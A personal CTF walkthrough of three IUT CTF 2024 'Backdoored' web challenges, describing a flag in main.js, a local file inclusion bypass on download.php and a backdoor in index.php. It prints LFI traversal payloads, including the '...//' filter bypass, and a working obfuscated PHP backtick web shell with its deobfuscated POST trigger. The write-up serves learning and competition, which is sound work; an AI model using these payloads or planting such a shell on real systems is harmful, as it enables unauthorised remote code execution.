IUT CTF 2024 - Backdoored Walkthrough

Robiul Awal Fagun
May 09, 2024

Assalamu Alaikum, Hey there I'm Robiul Awal Fagun aka 0xRobiul and you all know "I'm alone, I'm Infinity,I'm From 0xInfinity!".

I was really sick enough (average 101° - 103° fever and flue), whatever Alhamdulillah I've managed to play whole CTF and tried my best by the grace of Almighty Allah! 

Let's jump in...

Backdoored-1:

First things first, as always I started to look all around the source code, and I found the first flag in a java script file named main.js inside /static/js/main.js

Also I got something interesting just below the flag as you can see.

Let's move into next..

Backdoored-2:


As i got something interesting on previous challenge so i started my game from here. 

After taking a look on that, the first thing came in my mind is Local File Inclusion(LFI), download.php allows to download file and the parameter file= contains the file name about to be download. 

As the challenge description said to check server-side file, so I started to look for the exact download.php that I'm currently in. 

So I started to send my payloads after /download.php?file= like:

```
download.php
../../download.php
Li4vLi4vZG93bmxvYWQucGhwCg== (Base64 Encoded)
```
After trying same type of payload I moved and started to use LFI Bypass Techniques and finally i become success with this payload ...//download.php and I send this like /download.php?file=Li4uLy9kb3dubG9hZC5waHAK , that returns me the flag.


Also you can see which kind of sanitization has been used.

Let's move again...

Backdoored-3:


As they mentioned backdoor injected in a server-side file but there wasn't anything suspicious on download.php , so I started to look for the backdoor and got with the same payload in index.php file. That looks like:


After hunting on GitHub I found it's a backtick shell and it's obfuscated:

````<?php $_=``.[];$__=@$_;$_= $__[0]; $_1 = $__[2]; $_1++;$_1++;$_1++;$_1++;$_1++;$_1++;$_++;$_++;$_0 = $_;$_++;$_2 = ++$_; $_55 = '_'.(','^'|').('/'^'`').('-'^'~').(')'^'}'); $_ = $_2.$_1.$_2.$_0; $_($$_55[_]);?>````

And this part of this code represents the parameter I'm about to use:
Obfuscated:
````$_($$_55[_]); ````
Deobfuscated:
````$_($_POST[_])````
I used my VPS for getting call-back of the reverse shell and used this command:


And I got the flag:




Also you can check this video:



./Thanks!!